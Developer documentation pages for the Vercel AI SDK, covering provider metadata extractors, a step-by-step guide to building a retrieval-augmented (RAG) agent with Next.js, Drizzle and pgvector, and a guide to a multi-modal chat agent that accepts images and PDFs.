The OpenAI Compatible provider supports extracting provider-specific metadata from API responses through metadata extractors. These extractors allow you to capture additional information returned by the provider beyond the standard response format.
Metadata extractors receive the raw, unprocessed response data from the provider, giving you complete flexibility to extract any custom fields or experimental features that the provider may include. This is particularly useful when:
- Working with providers that include non-standard response fields
- Experimenting with beta or preview features
- Capturing provider-specific metrics or debugging information
- Supporting rapid provider API evolution without SDK changes
Metadata extractors work with both streaming and non-streaming chat completions and consist of two main components:
- A function to extract metadata from complete responses
- A streaming extractor that can accumulate metadata across chunks in a streaming response
Here's an example metadata extractor that captures both standard and custom provider data:
const myMetadataExtractor: MetadataExtractor = {
// Process complete, non-streaming responses
extractMetadata: ({ parsedBody }) => {
// You have access to the complete raw response
// Extract any fields the provider includes
return {
myProvider: {
standardUsage: parsedBody.usage,
experimentalFeatures: parsedBody.beta_features,
customMetrics: {
processingTime: parsedBody.server_timing?.total_ms,
modelVersion: parsedBody.model_version,
// ... any other provider-specific data
},
},
};
},
// Process streaming responses
createStreamExtractor: () => {
let accumulatedData = {
timing: [],
customFields: {},
};
return {
// Process each chunk's raw data
processChunk: parsedChunk => {
if (parsedChunk.server_timing) {
accumulatedData.timing.push(parsedChunk.server_timing);
}
if (parsedChunk.custom_data) {
Object.assign(accumulatedData.customFields, parsedChunk.custom_data);
}
},
// Build final metadata from accumulated data
buildMetadata: () => ({
myProvider: {
streamTiming: accumulatedData.timing,
customData: accumulatedData.customFields,
},
}),
};
},
};
You can provide a metadata extractor when creating your provider instance:
const provider = createOpenAICompatible({
name: 'my-provider',
apiKey: process.env.PROVIDER_API_KEY,
baseURL: 'https://api.provider.com/v1',
metadataExtractor: myMetadataExtractor,
});
The extracted metadata will be included in the response under the providerMetadata field:
const { text, providerMetadata } = await generateText({
model: provider('model-id'),
prompt: 'Hello',
});
console.log(providerMetadata.myProvider.customMetrics);
This allows you to access provider-specific information while maintaining a consistent interface across different providers.
title: RAG Agent
description: Learn how to build a RAG Agent with the AI SDK and Next.js
tags: ['rag', 'chatbot', 'next', 'embeddings', 'database', 'retrieval', 'memory', 'agent']
RAG Agent Guide
In this guide, you will learn how to build a retrieval-augmented generation (RAG) agent.
Before we dive in, let's look at what RAG is, and why we would want to use it.
What is RAG?
RAG stands for retrieval augmented generation. In simple terms, RAG is the process of providing a Large Language Model (LLM) with specific information relevant to the prompt.
Why is RAG important?
While LLMs are powerful, the information they can reason on is restricted to the data they were trained on. This problem becomes apparent when asking an LLM for information outside of its training data, like proprietary data or information that emerged after the model's training cutoff. RAG solves this problem by fetching information relevant to the prompt and then passing that to the model as context.
To illustrate with a basic example, imagine asking the model for your favorite food:
**input**
What is my favorite food?
**generation**
I don't have access to personal information about individuals, including their
favorite foods.
Not surprisingly, the model doesn’t know. But imagine, alongside your prompt, the model received some extra context:
**input**
Respond to the user's prompt using only the provided context.
user prompt: 'What is my favorite food?'
context: user loves chicken nuggets
**generation**
Your favorite food is chicken nuggets!
Just like that, you have augmented the model's generation by providing relevant information to the query. Assuming the model has the appropriate information, it is now highly likely to return an accurate response to the user's query. But how does it retrieve the relevant information? The answer lies in a concept called embeddings.
Embedding
Embeddings are a way to represent words, phrases, or images as vectors in a high-dimensional space. In this space, similar words are close to each other, and the distance between words can be used to measure their similarity.
In practice, this means that if you embedded the words cat and dog, you would expect them to be plotted close to each other in vector space. The process of calculating the similarity between two vectors is called ‘cosine similarity’ where a value of 1 would indicate high similarity and a value of -1 would indicate high opposition.
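To make this concrete, here is a minimal sketch using the AI SDK's embedMany and cosineSimilarity helpers; the embedding model id is the same one this guide uses later:
import { embedMany, cosineSimilarity } from 'ai';
const { embeddings } = await embedMany({
  model: 'openai/text-embedding-ada-002',
  values: ['cat', 'dog'],
});
// Values close to 1 indicate high similarity; values close to -1 indicate opposition.
console.log(cosineSimilarity(embeddings[0], embeddings[1]));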
As mentioned above, embeddings are a way to represent the semantic meaning of words and phrases. The implication here is that the larger the input to your embedding, the lower quality the embedding will be. So how would you approach embedding content longer than a simple phrase?
Chunking
Chunking refers to the process of breaking down a particular source material into smaller pieces. There are many different approaches to chunking and it’s worth experimenting as the most effective approach can differ by use case. A simple and common approach to chunking (and what you will be using in this guide) is separating written content by sentences.
Once your source material is appropriately chunked, you can embed each one and then store the embedding and the chunk together in a database. Embeddings can be stored in any database that supports vectors. For this tutorial, you will be using Postgres alongside the pgvector plugin.
All Together Now
Combining all of this together, RAG is the process of enabling the model to respond with information outside of its training data by embedding the user's query, retrieving the relevant source material (chunks) with the highest semantic similarity, and then passing them alongside the initial query as context. Going back to the example where you ask the model for your favorite food, the prompt preparation process would look like the augmented example above.
By passing the appropriate context and refining the model’s objective, you are able to fully leverage its strengths as a reasoning machine.
Onto the project!
Project Setup
In this project, you will build an agent that will only respond with information that it has within its knowledge base. The agent will be able to both store and retrieve information. This project has many interesting use cases from customer support through to building your own second brain!
This project will use the following stack:
- Next.js 14 (App Router)
- AI SDK
- Vercel AI Gateway
- Drizzle ORM
- Postgres with pgvector
- shadcn-ui and TailwindCSS for styling
Clone Repo
To reduce the scope of this guide, you will be starting with a repository that already has a few things set up for you:
- Drizzle ORM (lib/db) including an initial migration and a script to migrate (db:migrate)
- a basic schema for the resources table (this will be for source material)
- a Server Action for creating a resource
To get started, clone the starter repository with the following command:
git clone https://github.com/vercel/ai-sdk-rag-starter
cd ai-sdk-rag-starter
First things first, run the following command to install the project's dependencies:
pnpm install
Create Database
You will need a Postgres database to complete this tutorial. If you don't have Postgres set up on your local machine you can:
- Create a free Postgres database with Vercel (recommended - see instructions below); or
- Follow this guide to set it up locally
Setting up Postgres with Vercel
To set up a Postgres instance on your Vercel account:
- Go to Vercel.com and make sure you're logged in
- Navigate to your team homepage
- Click on the Integrations tab
- Click Browse Marketplace
- Look for the Storage option in the sidebar
- Select the Neon option (recommended, but any other PostgreSQL database provider should work)
- Click Install, then click Install again in the top right corner
- On the "Get Started with Neon" page, click Create Database on the right
- Select your region (e.g., Washington, D.C., U.S. East)
- Turn off Auth
- Click Continue
- Name your database (you can use the default name or rename it to something like "RagTutorial")
- Click Create in the bottom right corner
- After seeing "Database created successfully", click Done
- You'll be redirected to your database instance
- In the Quick Start section, click Show secrets
- Copy the full DATABASE_URL environment variable
Migrate Database
Once you have a Postgres database, you need to add the connection string as an environment secret.
Make a copy of the .env.example file and rename it to .env.
Open the new .env file. You should see an item called DATABASE_URL. Copy in your database connection string after the equals sign.
With that set up, you can now run your first database migration. Run the following command:
pnpm db:migrate
This will first add the pgvector extension to your database. Then it will create a new table for your resources schema that is defined in lib/db/schema/resources.ts. This schema has four columns: id, content, createdAt, and updatedAt.
Vercel AI Gateway Key
For this guide, you will need a Vercel AI Gateway API key, which gives you access to hundreds of models from different providers with one API key. If you haven't obtained your Vercel AI Gateway API key, you can do so by signing up on the Vercel website.
Now, open your .env file and add your API Gateway key:
AI_GATEWAY_API_KEY=your-api-key
Replace your-api-key with your actual Vercel AI Gateway API key.
Build
Let’s build a quick task list of what needs to be done:
- Create a table in your database to store embeddings
- Add logic to chunk and create embeddings when creating resources
- Create an agent
- Give the agent tools to query / create resources for its knowledge base
Create Embeddings Table
Currently, your application has one table (resources) which has a column (content) for storing content. Remember, each resource (source material) will have to be chunked, embedded, and then stored. Let’s create a table called embeddings to store these chunks.
Create a new file (lib/db/schema/embeddings.ts) and add the following code:
import { nanoid } from '@/lib/utils';
import { index, pgTable, text, varchar, vector } from 'drizzle-orm/pg-core';
import { resources } from './resources';
export const embeddings = pgTable(
'embeddings',
{
id: varchar('id', { length: 191 })
.primaryKey()
.$defaultFn(() => nanoid()),
resourceId: varchar('resource_id', { length: 191 }).references(
() => resources.id,
{ onDelete: 'cascade' },
),
content: text('content').notNull(),
embedding: vector('embedding', { dimensions: 1536 }).notNull(),
},
table => ({
embeddingIndex: index('embeddingIndex').using(
'hnsw',
table.embedding.op('vector_cosine_ops'),
),
}),
);
This table has four columns:
- id: unique identifier
- resourceId: a foreign key relation to the full source material
- content: the plain text chunk
- embedding: the vector representation of the plain text chunk
To perform similarity search efficiently, you also need an index (HNSW or IVFFlat) on the embedding column; the schema above already defines an HNSW index.
To push this change to the database, run the following command:
pnpm db:push
Add Embedding Logic
Now that you have a table to store embeddings, it’s time to write the logic to create the embeddings.
Create the file at lib/ai/embedding.ts with the following command:
mkdir -p lib/ai && touch lib/ai/embedding.ts
Generate Chunks
Remember, to create an embedding, you will start with a piece of source material (unknown length), break it down into smaller chunks, embed each chunk, and then save the chunk to the database. Let’s start by creating a function to break the source material into small chunks.
const generateChunks = (input: string): string[] => {
return input
.trim()
.split('.')
.filter(i => i !== '');
};
This function will take an input string and split it by periods, filtering out any empty items. This will return an array of strings. It is worth experimenting with different chunking techniques in your projects as the best technique will vary.
Install AI SDK
You will use the AI SDK to create embeddings. This will require two more dependencies, which you can install by running the following command:
pnpm add ai @ai-sdk/react
This will install the AI SDK and the AI SDK's React hooks.
Generate Embeddings
Let’s add a function to generate embeddings. Copy the following code into your lib/ai/embedding.ts file.
import { embedMany } from 'ai';
const embeddingModel = 'openai/text-embedding-ada-002';
const generateChunks = (input: string): string[] => {
return input
.trim()
.split('.')
.filter(i => i !== '');
};
export const generateEmbeddings = async (
value: string,
): Promise<Array<{ embedding: number[]; content: string }>> => {
const chunks = generateChunks(value);
const { embeddings } = await embedMany({
model: embeddingModel,
values: chunks,
});
return embeddings.map((e, i) => ({ content: chunks[i], embedding: e }));
};
In this code, you first define the model you want to use for the embeddings. In this example, you are using OpenAI’s text-embedding-ada-002 embedding model.
Next, you create an asynchronous function called generateEmbeddings. This function will take in the source material (value) as an input and return a promise of an array of objects, each containing an embedding and content. Within the function, you first generate chunks for the input. Then, you pass those chunks to the embedMany function imported from the AI SDK which will return embeddings of the chunks you passed in. Finally, you map over and return the embeddings in a format that is ready to save in the database.
Update Server Action
Open the file at lib/actions/resources.ts. This file has one function, createResource, which, as the name implies, allows you to create a resource.
'use server';
import {
NewResourceParams,
insertResourceSchema,
resources,
} from '@/lib/db/schema/resources';
import { db } from '../db';
export const createResource = async (input: NewResourceParams) => {
try {
const { content } = insertResourceSchema.parse(input);
const [resource] = await db
.insert(resources)
.values({ content })
.returning();
return 'Resource successfully created.';
} catch (e) {
if (e instanceof Error)
return e.message.length > 0 ? e.message : 'Error, please try again.';
}
};
This function is a Server Action, as denoted by the 'use server'; directive at the top of the file. This means that it can be called anywhere in your Next.js application. This function will take an input, run it through a Zod schema to ensure it adheres to the correct schema, and then create a new resource in the database. This is the ideal location to generate and store embeddings of the newly created resources.
Update the file with the following code:
'use server';
import {
NewResourceParams,
insertResourceSchema,
resources,
} from '@/lib/db/schema/resources';
import { db } from '../db';
import { generateEmbeddings } from '../ai/embedding';
import { embeddings as embeddingsTable } from '../db/schema/embeddings';
export const createResource = async (input: NewResourceParams) => {
try {
const { content } = insertResourceSchema.parse(input);
const [resource] = await db
.insert(resources)
.values({ content })
.returning();
const embeddings = await generateEmbeddings(content);
await db.insert(embeddingsTable).values(
embeddings.map(embedding => ({
resourceId: resource.id,
...embedding,
})),
);
return 'Resource successfully created and embedded.';
} catch (error) {
return error instanceof Error && error.message.length > 0
? error.message
: 'Error, please try again.';
}
};
First, you call the generateEmbeddings function created in the previous step, passing in the source material (content). Once you have the embeddings of the source material, you can save them to the database, passing the resourceId alongside each embedding.
Create Root Page
Great! Let's build the frontend. The AI SDK’s useChat hook allows you to easily create a conversational user interface for your agent.
Replace your root page (app/page.tsx) with the following code.
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Chat() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat();
return (
<div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
<div className="space-y-4">
{messages.map(m => (
<div key={m.id} className="whitespace-pre-wrap">
<div>
<div className="font-bold">{m.role}</div>
{m.parts.map(part => {
switch (part.type) {
case 'text':
return <p>{part.text}</p>;
}
})}
</div>
</div>
))}
</div>
<form
onSubmit={e => {
e.preventDefault();
sendMessage({ text: input });
setInput('');
}}
>
<input
className="fixed bottom-0 w-full max-w-md p-2 mb-8 border border-gray-300 rounded shadow-xl"
value={input}
placeholder="Say something..."
onChange={e => setInput(e.currentTarget.value)}
/>
</form>
</div>
);
}
The useChat hook enables the streaming of chat messages from your AI provider (you will be using OpenAI via the Vercel AI Gateway), manages the state for chat input, and updates the UI automatically as new messages are received.
Run the following command to start the Next.js dev server:
pnpm run dev
Head to http://localhost:3000. You should see an empty screen with an input bar floating at the bottom. Try to send a message. The message shows up in the UI for a fraction of a second and then disappears. This is because you haven’t set up the corresponding API route to call the model! By default, useChat will send a POST request to the /api/chat endpoint with the messages as the request body.
You can customize the endpoint in the useChat configuration object.
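For example, here is a sketch pointing the hook at a hypothetical /api/custom-chat route using a custom transport (DefaultChatTransport is exported from 'ai'):
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
// '/api/custom-chat' is an illustrative route, not part of this guide.
const { messages, sendMessage } = useChat({
  transport: new DefaultChatTransport({ api: '/api/custom-chat' }),
});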
Create API Route
In Next.js, you can create custom request handlers for a given route using Route Handlers. Route Handlers are defined in a route.ts file and can export handlers for HTTP methods like GET, POST, PUT, and PATCH.
Create a file at app/api/chat/route.ts by running the following command:
mkdir -p app/api/chat && touch app/api/chat/route.ts
Open the file and add the following code:
import { convertToModelMessages, streamText, UIMessage } from 'ai';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: 'openai/gpt-4o',
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
In this code, you declare and export an asynchronous function called POST. You retrieve the messages from the request body and then pass them to the streamText function imported from the AI SDK, alongside the model you would like to use. Finally, you return the model’s response in UIMessageStreamResponse format.
Head back to the browser and try to send a message again. You should see a response from the model streamed directly in!
Refining your prompt
While you now have a working agent, it isn't doing anything special.
Let’s add system instructions to refine and restrict the model’s behavior. In this case, you want the model to only use information it has retrieved to generate responses. Update your route handler with the following code:
import { convertToModelMessages, streamText, UIMessage } from 'ai';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: 'openai/gpt-4o',
system: `You are a helpful assistant. Check your knowledge base before answering any questions.
Only respond to questions using information from tool calls.
if no relevant information is found in the tool calls, respond, "Sorry, I don't know."`,
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
Head back to the browser and try to ask the model what your favorite food is. The model should now respond exactly as you instructed above (“Sorry, I don’t know”) given it doesn’t have any relevant information.
In its current form, your agent is now, well, useless. How do you give the model the ability to add and query information?
Using Tools
A tool is a function that can be called by the model to perform a specific task. You can think of a tool like a program you give to the model that it can run as and when it deems necessary.
Let’s see how you can create a tool to give the model the ability to create, embed, and save a resource to your agent's knowledge base.
Add Resource Tool
Update your route handler with the following code:
import { createResource } from '@/lib/actions/resources';
import { convertToModelMessages, streamText, tool, UIMessage } from 'ai';
import { z } from 'zod';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: 'openai/gpt-4o',
system: `You are a helpful assistant. Check your knowledge base before answering any questions.
Only respond to questions using information from tool calls.
If no relevant information is found in the tool calls, respond, "Sorry, I don't know."`,
messages: await convertToModelMessages(messages),
tools: {
addResource: tool({
description: `add a resource to your knowledge base.
If the user provides a random piece of knowledge unprompted, use this tool without asking for confirmation.`,
inputSchema: z.object({
content: z
.string()
.describe('the content or resource to add to the knowledge base'),
}),
execute: async ({ content }) => createResource({ content }),
}),
},
});
return result.toUIMessageStreamResponse();
}
In this code, you define a tool called addResource. This tool has three elements:
- description: description of the tool that will influence when the tool is picked.
- inputSchema: Zod schema that defines the input necessary for the tool to run.
- execute: An asynchronous function that is called with the arguments from the tool call.
In simple terms, on each generation, the model will decide whether it should call the tool. If it deems it should call the tool, it will extract the input and then append a new message to the messages array of type tool-call. The AI SDK will then run the execute function with the parameters provided by the tool-call message.
Head back to the browser and tell the model your favorite food. You should see an empty response in the UI. Did anything happen? Let’s see. Run the following command in a new terminal window.
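In the starter project this is typically exposed as a Drizzle script (the script name below is assumed):
<Snippet text={['pnpm db:studio']} />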
This will start Drizzle Studio, where you can view the rows in your database. You should see a new row in both the embeddings and resources tables with your favorite food!
Let’s make a few changes in the UI to communicate to the user when a tool has been called. Head back to your root page (app/page.tsx) and add the following code:
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Chat() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat();
return (
<div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
<div className="space-y-4">
{messages.map(m => (
<div key={m.id} className="whitespace-pre-wrap">
<div>
<div className="font-bold">{m.role}</div>
{m.parts.map((part, index) => {
switch (part.type) {
case 'text':
return <p key={`${m.id}-part-${index}`}>{part.text}</p>;
case 'tool-addResource':
case 'tool-getInformation':
return (
<div key={`${m.id}-part-${index}`}>
call{part.state === 'output-available' ? 'ed' : 'ing'}{' '}
tool: {part.type}
<pre className="my-4 bg-zinc-100 p-2 rounded-sm">
{JSON.stringify(part.input, null, 2)}
</pre>
</div>
);
}
})}
</div>
</div>
))}
</div>
<form
onSubmit={e => {
e.preventDefault();
sendMessage({ text: input });
setInput('');
}}
>
<input
className="fixed bottom-0 w-full max-w-md p-2 mb-8 border border-gray-300 rounded shadow-xl"
value={input}
placeholder="Say something..."
onChange={e => setInput(e.currentTarget.value)}
/>
</form>
</div>
);
}
With this change, you now conditionally render the tool that has been called directly in the UI. Save the file and head back to the browser. Tell the model your favorite movie. You should see which tool is called in place of the model’s typical text response.
Improving UX with Multi-Step Calls
It would be nice if the model could summarize the action too. However, technically, once the model calls a tool, it has completed its generation as it ‘generated’ a tool call. How could you achieve this desired behavior?
The AI SDK has a feature called stopWhen that lets you define stopping conditions for multi-step generations. When the model generates a tool call and those stopping conditions haven't been met, the AI SDK will automatically send the tool result back to the model and trigger another generation.
Open your route handler (app/api/chat/route.ts) and add the following key to the streamText configuration object:
import { createResource } from '@/lib/actions/resources';
import {
convertToModelMessages,
streamText,
tool,
UIMessage,
stepCountIs,
} from 'ai';
import { z } from 'zod';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: 'openai/gpt-4o',
system: `You are a helpful assistant. Check your knowledge base before answering any questions.
Only respond to questions using information from tool calls.
If no relevant information is found in the tool calls, respond, "Sorry, I don't know."`,
messages: await convertToModelMessages(messages),
stopWhen: stepCountIs(5),
tools: {
addResource: tool({
description: `add a resource to your knowledge base.
If the user provides a random piece of knowledge unprompted, use this tool without asking for confirmation.`,
inputSchema: z.object({
content: z
.string()
.describe('the content or resource to add to the knowledge base'),
}),
execute: async ({ content }) => createResource({ content }),
}),
},
});
return result.toUIMessageStreamResponse();
}
Head back to the browser and tell the model your favorite pizza topping (note: pineapple is not an option). You should see a follow-up response from the model confirming the action.
Retrieve Resource Tool
The model can now add and embed arbitrary information to your knowledge base. However, it still isn’t able to query it. Let’s create a new tool to allow the model to answer questions by finding relevant information in your knowledge base.
To find similar content, you will need to embed the user’s query, search the database for semantic similarity, then pass those items to the model as context alongside the query. To achieve this, let’s update your embedding logic file (lib/ai/embedding.ts):
import { embed, embedMany } from 'ai';
import { db } from '../db';
import { cosineDistance, desc, gt, sql } from 'drizzle-orm';
import { embeddings } from '../db/schema/embeddings';
const embeddingModel = 'openai/text-embedding-ada-002';
const generateChunks = (input: string): string[] => {
return input
.trim()
.split('.')
.filter(i => i !== '');
};
export const generateEmbeddings = async (
value: string,
): Promise<Array<{ embedding: number[]; content: string }>> => {
const chunks = generateChunks(value);
const { embeddings } = await embedMany({
model: embeddingModel,
values: chunks,
});
return embeddings.map((e, i) => ({ content: chunks[i], embedding: e }));
};
export const generateEmbedding = async (value: string): Promise<number[]> => {
const input = value.replaceAll('\n', ' '); // replace newline characters with spaces before embedding
const { embedding } = await embed({
model: embeddingModel,
value: input,
});
return embedding;
};
export const findRelevantContent = async (userQuery: string) => {
const userQueryEmbedded = await generateEmbedding(userQuery);
const similarity = sql<number>`1 - (${cosineDistance(
embeddings.embedding,
userQueryEmbedded,
)})`;
const similarGuides = await db
.select({ name: embeddings.content, similarity })
.from(embeddings)
.where(gt(similarity, 0.5))
.orderBy(t => desc(t.similarity))
.limit(4);
return similarGuides;
};
In this code, you add two functions:
- generateEmbedding: generates a single embedding from an input string
- findRelevantContent: embeds the user’s query, searches the database for similar items, then returns the relevant items
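As a quick illustration of how these functions fit together, here is a hypothetical call (the returned values are made up for demonstration):
const matches = await findRelevantContent('what is my favorite food?');
// e.g. [{ name: 'my favorite food is pizza', similarity: 0.82 }]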
With that done, it’s onto the final step: creating the tool.
Go back to your route handler (app/api/chat/route.ts) and add a new tool called getInformation:
import { createResource } from '@/lib/actions/resources';
import {
convertToModelMessages,
streamText,
tool,
UIMessage,
stepCountIs,
} from 'ai';
import { z } from 'zod';
import { findRelevantContent } from '@/lib/ai/embedding';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: 'openai/gpt-4o',
messages: await convertToModelMessages(messages),
stopWhen: stepCountIs(5),
system: `You are a helpful assistant. Check your knowledge base before answering any questions.
Only respond to questions using information from tool calls.
If no relevant information is found in the tool calls, respond, "Sorry, I don't know."`,
tools: {
addResource: tool({
description: `add a resource to your knowledge base.
If the user provides a random piece of knowledge unprompted, use this tool without asking for confirmation.`,
inputSchema: z.object({
content: z
.string()
.describe('the content or resource to add to the knowledge base'),
}),
execute: async ({ content }) => createResource({ content }),
}),
getInformation: tool({
description: `get information from your knowledge base to answer questions.`,
inputSchema: z.object({
question: z.string().describe("the user's question"),
}),
execute: async ({ question }) => findRelevantContent(question),
}),
},
});
return result.toUIMessageStreamResponse();
}
Head back to the browser, refresh the page, and ask the model what your favorite food is. You should see the model call the getInformation tool and then use the relevant information to formulate a response!
Conclusion
Congratulations, you have successfully built an AI agent that can dynamically add and retrieve information to and from a knowledge base. Throughout this guide, you learned how to create and store embeddings, set up server actions to manage resources, and use tools to extend the capabilities of your agent.
Troubleshooting Migration Error
If you experience an error with the migration, open your migration file (lib/db/migrations/0000_yielding_bloodaxe.sql), cut (copy and remove) the first line, and run it directly against your Postgres instance. You should then be able to run the updated migration.
If you're using the Vercel setup above, you can run the command directly by either:
- Going to the Neon console and entering the command there, or
- Going back to the Vercel platform, navigating to the Quick Start section of your database, and finding the PSQL connection command (second tab). This will connect to your instance in the terminal where you can run the command directly.
title: Multi-Modal Agent
description: Learn how to build a multi-modal agent that can process images and PDFs with the AI SDK.
tags: ['multi-modal', 'agent', 'images', 'pdf', 'vision', 'next']
Multi-Modal Agent
In this guide, you will build a multi-modal agent capable of understanding both images and PDFs.
Multi-modal refers to the ability of the agent to understand and generate responses in multiple formats. In this guide, we'll focus on images and PDFs - two common document types that modern language models can process natively.
We'll build this agent using OpenAI's GPT-4o, but the same code works seamlessly with other providers - you can switch between them by changing just one line of code.
Prerequisites
To follow this quickstart, you'll need:
- Node.js 18+ and pnpm installed on your local development machine.
- A Vercel AI Gateway API key.
If you haven't obtained your Vercel AI Gateway API key, you can do so by signing up on the Vercel website.
Create Your Application
Start by creating a new Next.js application. This command will create a new directory named multi-modal-agent and set up a basic Next.js application inside it.
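For example, with pnpm (any package manager works):
<Snippet text={['pnpm create next-app@latest multi-modal-agent']} />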
Navigate to the newly created directory:
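<Snippet text={['cd multi-modal-agent']} />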
Install dependencies
Install ai and @ai-sdk/react, the AI SDK package and the AI SDK's React package respectively.
<Snippet text="bun add ai @ai-sdk/react" dark />
Configure your Vercel AI Gateway API key
Create a .env.local file in your project root and add your Vercel AI Gateway API key. This key authenticates your application with Vercel AI Gateway.
Edit the .env.local file:
AI_GATEWAY_API_KEY=your_api_key_here
Replace your_api_key_here with your actual Vercel AI Gateway API key.
Implementation Plan
To build a multi-modal agent, you will need to:
- Create a Route Handler to handle incoming chat messages and generate responses.
- Wire up the UI to display chat messages, provide a user input, and handle submitting new messages.
- Add the ability to upload images and PDFs and attach them alongside the chat messages.
Create a Route Handler
Create a route handler at app/api/chat/route.ts and add the following code:
import { streamText, convertToModelMessages, type UIMessage } from 'ai';
// Allow streaming responses up to 30 seconds
export const maxDuration = 30;
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: 'openai/gpt-4o',
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
Let's take a look at what is happening in this code:
1. Define an asynchronous POST request handler and extract messages from the body of the request. The messages variable contains a history of the conversation between you and the agent and provides the agent with the necessary context to make the next generation.
2. Convert the UI messages to model messages using convertToModelMessages, which transforms the UI-focused message format to the format expected by the language model.
3. Call streamText, which is imported from the ai package. This function accepts a configuration object that contains a model provider and messages (converted in step 2). You can pass additional settings to further customize the model's behavior.
4. The streamText function returns a StreamTextResult. This result object contains the toUIMessageStreamResponse function, which converts the result to a streamed response object.
5. Finally, return the result to the client to stream the response.
This Route Handler creates a POST request endpoint at /api/chat.
Wire up the UI
Now that you have a Route Handler that can query a large language model (LLM), it's time to set up your frontend. AI SDK UI abstracts the complexity of a chat interface into one hook, useChat.
Update your root page (app/page.tsx) with the following code to show a list of chat messages and provide a user message input:
'use client';
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';
export default function Chat() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat({
transport: new DefaultChatTransport({
api: '/api/chat',
}),
});
return (
<div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
{messages.map(m => (
<div key={m.id} className="whitespace-pre-wrap">
{m.role === 'user' ? 'User: ' : 'AI: '}
{m.parts.map((part, index) => {
if (part.type === 'text') {
return <span key={`${m.id}-text-${index}`}>{part.text}</span>;
}
return null;
})}
</div>
))}
<form
onSubmit={async event => {
event.preventDefault();
sendMessage({
role: 'user',
parts: [{ type: 'text', text: input }],
});
setInput('');
}}
className="fixed bottom-0 w-full max-w-md mb-8 border border-gray-300 rounded shadow-xl"
>
<input
className="w-full p-2"
value={input}
placeholder="Say something..."
onChange={e => setInput(e.target.value)}
/>
</form>
</div>
);
}
This page utilizes the useChat hook, configured with DefaultChatTransport to specify the API endpoint. The useChat hook provides multiple utility functions and state variables:
- messages: the current chat messages (an array of objects with id, role, and parts properties).
- sendMessage: a function to send a new message to the AI.
- Each message contains a parts array that can include text, images, PDFs, and other content types.
- Files are converted to data URLs before being sent to maintain compatibility across different environments.
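For illustration, a minimal user message in this shape might look like the following (values are hypothetical):
const exampleMessage = {
  id: 'msg-1',
  role: 'user' as const,
  parts: [{ type: 'text' as const, text: 'Hello!' }],
};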
Add File Upload
To make your agent multi-modal, let's add the ability to upload and send both images and PDFs to the model. In v5, files are sent as part of the message's parts array. Files are converted to data URLs using the FileReader API before being sent to the server.
Update your root page (app/page.tsx) with the following code:
'use client';
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useRef, useState } from 'react';
import Image from 'next/image';
async function convertFilesToDataURLs(files: FileList) {
return Promise.all(
Array.from(files).map(
file =>
new Promise<{
type: 'file';
mediaType: string;
url: string;
}>((resolve, reject) => {
const reader = new FileReader();
reader.onload = () => {
resolve({
type: 'file',
mediaType: file.type,
url: reader.result as string,
});
};
reader.onerror = reject;
reader.readAsDataURL(file);
}),
),
);
}
export default function Chat() {
const [input, setInput] = useState('');
const [files, setFiles] = useState<FileList | undefined>(undefined);
const fileInputRef = useRef<HTMLInputElement>(null);
const { messages, sendMessage } = useChat({
transport: new DefaultChatTransport({
api: '/api/chat',
}),
});
return (
<div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
{messages.map(m => (
<div key={m.id} className="whitespace-pre-wrap">
{m.role === 'user' ? 'User: ' : 'AI: '}
{m.parts.map((part, index) => {
if (part.type === 'text') {
return <span key={`${m.id}-text-${index}`}>{part.text}</span>;
}
if (part.type === 'file' && part.mediaType?.startsWith('image/')) {
return (
<Image
key={`${m.id}-image-${index}`}
src={part.url}
width={500}
height={500}
alt={`attachment-${index}`}
/>
);
}
if (part.type === 'file' && part.mediaType === 'application/pdf') {
return (
<iframe
key={`${m.id}-pdf-${index}`}
src={part.url}
width={500}
height={600}
title={`pdf-${index}`}
/>
);
}
return null;
})}
</div>
))}
<form
className="fixed bottom-0 w-full max-w-md p-2 mb-8 border border-gray-300 rounded shadow-xl space-y-2"
onSubmit={async event => {
event.preventDefault();
const fileParts =
files && files.length > 0
? await convertFilesToDataURLs(files)
: [];
sendMessage({
role: 'user',
parts: [{ type: 'text', text: input }, ...fileParts],
});
setInput('');
setFiles(undefined);
if (fileInputRef.current) {
fileInputRef.current.value = '';
}
}}
>
<input
type="file"
accept="image/*,application/pdf"
className=""
onChange={event => {
if (event.target.files) {
setFiles(event.target.files);
}
}}
multiple
ref={fileInputRef}
/>
<input
className="w-full p-2"
value={input}
placeholder="Say something..."
onChange={e => setInput(e.target.value)}
/>
</form>
</div>
);
}
In this code, you:
- Add a helper function convertFilesToDataURLs to convert file uploads to data URLs.
- Create state to hold the input text, files, and a ref to the file input field.
- Configure useChat with DefaultChatTransport to specify the API endpoint.
- Display messages using the parts array structure, rendering text, images, and PDFs appropriately.
- Update the onSubmit function to send messages with the sendMessage function, including both text and file parts.
- Add a file input field to the form, including an onChange handler to handle updating the files state.
Running Your Application
With that, you have built everything you need for your multi-modal agent! To start your application, use the command:
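For a standard Next.js project, that's the dev script:
<Snippet text={['pnpm run dev']} />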
